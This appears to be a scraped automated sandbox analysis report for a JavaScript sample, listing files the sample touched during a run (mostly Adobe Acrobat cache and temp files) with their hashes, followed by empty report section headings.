C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG	ASCII text	EF274356F041738E50C1E17202C53A00	9C3E0C9FD054EBF9C310A0CCFD031E16FCF0BC99	3B79DACC3124622AE0CE1FB4809C325BC1FD849B2426A20103C15A7A93CF09D6
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)	ASCII text	EF274356F041738E50C1E17202C53A00	9C3E0C9FD054EBF9C310A0CCFD031E16FCF0BC99	3B79DACC3124622AE0CE1FB4809C325BC1FD849B2426A20103C15A7A93CF09D6
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\6f698d8c-43f4-4c16-85a5-35b621941830.tmp	JSON data	E41A6A213C9BA99338625EDDE78B5664	5F8F6215642361E0E14F4E5839F0714C8A618E50	5923DF571F4A641D3FB8CF0D83AD7C893799CD7B50FB8942713C30471E984CD7
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)	JSON data	E41A6A213C9BA99338625EDDE78B5664	5F8F6215642361E0E14F4E5839F0714C8A618E50	5923DF571F4A641D3FB8CF0D83AD7C893799CD7B50FB8942713C30471E984CD7
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log	data	843751A8BA3086A48F484515B44B66BB	D3C06338027D9F3400DFF476C44A22F0FCAF0704	8478F2165A2D8F69F6425594C5BEFB7F289D51971E486F61456987D8A5CFA942
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG	ASCII text	141755E72150667ACA93F2476AB7A0CF	AAA76E284F82B067FC81E211907BB9645A2EC00A	2E4E461E915B241177D703A3DB71504EDD37E5927B3FF527AEC126378CA69D5F
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)	ASCII text	141755E72150667ACA93F2476AB7A0CF	AAA76E284F82B067FC81E211907BB9645A2EC00A	2E4E461E915B241177D703A3DB71504EDD37E5927B3FF527AEC126378CA69D5F
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages	SQLite 3.x database, last written using SQLite version 3040000, file counter 11, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 11	1D44B6E29F6B741183ECD50857EEB111	D30C1F9A66F613617F05BB9693EB03A8B98E2B09	981D5037FFACADB1E9376422B7E8C17C3FC3995E7CCD4CBF3B30C2004A609335
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal	SQLite Rollback Journal	101F8551CD8582653E32202DC03C2763	9429C55F9CE47953A35006FA478C6DFDCED9857D	A5708F51645E6371754AB388CB7439B93A15BB1FD0A532EA592C71DB4C7C5CC6
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D	Certificate, Version=3	0CD2F9E0DA1773E9ED864DA5E370E74E	CABD2A79A1076A31F21D253635CB039D4329A5E8	96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression	49AEBF8CBD62D92AC215B2923FB1B9F5	1723BE06719828DDA65AD804298D0431F6AFF976	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D	data	F935D0111024F0B0C83A4FD109E67B40	0016CEC56AEF910F0C855FDA7B36F328B5A68140	C0FEF0C5F5CE53BA01DAE2AC913674840A917996B11BA8DB07BCE0F8C945E28E
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	data	38128C60DDB2B876015470850C95ACBD	8AB04E40520AAB74A0CB818C0589A5EA6259D492	B07D9C20BC7ECEC8EE9B218CEC6D3CD5C9D75A7791AF0B03B50E42DB227B0F9C
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)	PostScript document text	8BA9D8BEBA42C23A5DB405994B54903F	FC1B1646EC8A7015F492AA17ADF9712B54858361	862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.6548	PostScript document text	8BA9D8BEBA42C23A5DB405994B54903F	FC1B1646EC8A7015F492AA17ADF9712B54858361	862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst (copy)	PostScript document text	B60EE534029885BD6DECA42D1263BDC0	4E801BA6CA503BDAE7E54B7DB65BE641F7C23375	B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.6548	PostScript document text	B60EE534029885BD6DECA42D1263BDC0	4E801BA6CA503BDAE7E54B7DB65BE641F7C23375	B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID	JSON data	A09251FCD0BA36DF72C882E0E7476F39	DD62DCC8989ACFD9DEC49FE1C42EC487826AB249	F3643DE9F38BA8F14B4874304A60867A828C6E14EDC2F79F2A33D36D9DCC0A53
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface	JSON data	8D02A45C2C08F142D4AB945565A27586	B1F25292EFFBF2501D8AC06A9D97554E8CF5CE0F	D92F7B92A9A424A04D2F6441516B4215B383ABCBEFD5D209F0DAEEEDAA9C7827
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface	JSON data	826F99A89300F3A16F3660204252D006	27DA95337D4D4F3AE1F60DD7FD631F3341CB965B	535A95274C4399ABFD4AE83668AFE865713E96774668B80625C1208A2B013C37
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD	JSON data	A4DD4205364734948D7149F2CF92B5B0	D30DCC49AA34AD1C8EF6C28DFBD452EBC92FB188	29C6ACF433D63059DA10728460B7FE278F4256D5DFC24ACAB655FF0D565E7892
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner	JSON data	F95281A5297B16E0207B1F80E220D19E	182E833A6E7ABBFFFB49FD429D336CC32237C5FA	0FE968505EBFD0A0F86EF83D7497C31CA404528BD24D377F60B5BDA5F9DFEB23
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner	JSON data	28BC041CB09A518F6B714907DF76A8A9	2C614A703CA9794E35111FE0653FA069A5831646	769BE750479DCB196ECE76C41A06A05B8FD9F627617F3F584562AFB7AF8B4340
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention	JSON data	AA2DE8AB3EABFA9A39039CF591B90443	9A98569B9E6F83AA1400313023397BEDD08EBD61	5EB873D2E42674F7B4224945AE7C7FD9039AB9923F9FDE22E43C04A16133C84E
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner	JSON data	0B00B39B6E577C79EE5DD26C62F8F30A	626A9E8AFB8F7DAAA1A642AACEC62F24813A3B55	A5A59B8A1724E809569B056FF58C878DC4AA445444779CC56E06D8193F051A6D
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner	JSON data	DAFCA60900A7F6BE4712A637A63B6064	E7D37C8F2CFDA630C4BB5E642E07F2AB0DF52D2A	03904AF617F9BBC876FF45F9754452208A6C82F4CD5E8004F9BDBEB671702FCF
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner	JSON data	2AC768BE9B2AF03CA1830B15F92FA26A	60C3388B03B053C8B6783065D1AB27DA5FFE5F71	CD08A8A68D8F35524C8E6B2120C5755258EF31834092A69FC7177B76EB3FE730
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner	JSON data	88E8F68DA4390A7E5E26592990331EDF	D2FE9C8D83DDCADF1319C81E9D24097B591580F7	A8696C685C5F41F4E3557A2F5FA254AB836CE8E22705C15ECBF8B42EF1093982
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner	JSON data	A31C34591C06D2BE374B828AD234A26C	E8D4AE91F76CD851FE9C15995069CDCEA9EDB19B	365222A81107ABE6BD17F8A231238D25CB81E224E994631189FB92C33CABA075
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention	JSON data	E23447A8C49A43094CB87C9B9217A803	6175C7B277D2EB7DAF901B08A1A529A820A8EBC1	0C0E5C5712559551DDE8B86215C9308D2A9BBBDC885E40C80BD6C28A76CC7C43
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner	JSON data	657D0227254C6D15B7B9E0813C2E659D	140091E2F760A06799C5AA1A54060E382C1795FD	CA6C01460D4B6FC0BC77C00C7629C2FC81F070A243B5974E30613372FC8977B1
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards	JSON data	82C875254190475453700B487835C4FB	E72F9DBDC3B592DF8826603E4303A758824531B8	88304215A0A1CF4D47EE3981F0C2ACB00C3E3584C0EECB0F7EB3F6B0810DF966
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020	JSON data	2B43B9F2C24F3F38857FB8E21A4829C0	CA18282CE67D918382D6F3590AF81D2E40A0EF34	5693BD029A2DDBEFB39CE1781A284F61089862ED5CB96FC50D8342626BEAE83E
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING	data	DC84B0D741E5BEAE8070013ADDCC8C28	802F4A6A20CBF157AAF6C4E07E4301578D5936A2	81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json	JSON data	9A309CC79A9E270D5A8ADAF2B2DE92E2	5604C024081D80FDF709B36C2227F13B7D909ED5	E849CFC62A3F5F5A7F883781E7C86EF1F862D582A322717614DA132440AE49AD
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents	SQLite 3.x database, last written using SQLite version 3040000, file counter 24, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 24	807B5123B59070B343D40A9EB0ADF54F	F45B8936368CB131A9EB3CB077974A0D4B99C38E	00292E383A4560CCD9FD0DB1BC508BDEA1886DDDE362A197869648879795AACC
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal	SQLite Rollback Journal	71707F2796CD7C1B70810666452703ED	BFE4170E5EEB71DAC0E0AD82AEE548406B932E09	0B9DE9245414141D05200330E98D9E78BC0AD8172F202917E3ADD7B56ADC212C
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin	data	BD42D825B60D36F5E2E9D29E22412D29	A0DCD2B2618441D4C2E2C1FA372357F5923715E2	CD46ADD7C681DE10F1F5FB8E52D98456A1816B20785AC10D4F71236C786FE88D
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	BC6DB77EB243BF62DC31267706650173	9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF	5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
C:\Users\user\AppData\Local\Temp\MSIc8e96.LOG	Unicode text, UTF-16, little-endian text, with CRLF line terminators	4493209A9937D0E0E0F995CAAA878A5D	2954CF47F302537FDF27C25645522C0CC9B1C0C8	1377C4282176BAC841803FE32CF882E25F90574D44AFE4DB0A563C58BB6637DF
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pnzol34r.4s2.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t5zmemlc.pxp.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-15 14-42-06-494.log	ASCII text, with very long lines (393)	128A51060103D95314048C2F32A15C66	EEB64761BE485729CD12BF4FBF7F2A68BA1AD7DB	601388D70DFB723E560FEA6AE08E5FEE8C1A980DF7DF9B6C10E1EC39705D4713
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log	ASCII text, with very long lines (393), with CRLF line terminators	8EF2BA3702879A4D60D98517F98E2F75	9E2EC6474AA3593AEF736A194943CA35E0619F72	CEA3A25E3A567D4E103D484F7140A83CCAF18855D86CB4CFA7A3D8E6535F9F53
C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt	ASCII text, with CRLF line terminators	18E1C33963A367BD53BD3E89AF442EE0	23150D723A99F97241BA78C866DE226ED511F2C9	668B0AE797A93AE99046342673141ECB70DCC8266692290E592DE3432B62BF12
C:\Users\user\AppData\Local\Temp\acrocef_low\436bc9ec-c6d2-4955-b51b-44f3c70b935c.tmp	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022	5C48B0AD2FEF800949466AE872E1F1E2	337D617AE142815EDDACB48484628C1F16692A2F	F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
C:\Users\user\AppData\Local\Temp\acrocef_low\538ad473-cd6b-4bfc-9554-b524a241774c.tmp	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538	3A49135134665364308390AC398006F1	28EF4CE5690BF8A9E048AF7D30688120DAC6F126	D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
C:\Users\user\AppData\Local\Temp\acrocef_low\5c516a6a-5836-4d72-aafd-e369d95bb857.tmp	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081	A0CFC77914D9BFBDD8BC1B1154A7B364	54962BFDF3797C95DC2A4C8B29E873743811AD30	81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
C:\Users\user\AppData\Local\Temp\acrocef_low\9077dea9-3573-47ef-ae75-73a3fad485ba.tmp	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142	CA6B0D9F8DDC295DACE8157B69CA7CF6	6299B4A49AB28786E7BF75E1481D8011E6022AF4	A933C727CE6547310A0D7DAD8704B0F16DB90E024218ACE2C39E46B8329409C7
C:\Users\user\AppData\Local\Temp\invoice.pdf	PDF document, version 1.7	91A2AF9E2A61ABF7D9977999FBF9879E	F6E4FA02DD15B27F74553FB1B220A4D2DF385267	FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp	JSON data	DCA83F08D448911A14C22EBCACC5AD57	91270525521B7FE0D986DB19747F47D34B6318AD	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9

Windows Analysis Report 1647911459241874440.js

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Software Vulnerabilities

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
1647911459241874440.js